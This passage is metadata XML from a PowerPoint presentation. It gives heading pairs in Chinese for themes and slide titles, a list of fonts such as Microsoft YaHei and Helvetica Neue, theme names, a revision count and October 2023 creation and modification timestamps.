        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>47</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="98"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Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体-简</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6_Office 主题</vt:lpstr>
      <vt:lpstr>38_自定义设计方案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104</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-05T04:08:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-05T04:08:29Z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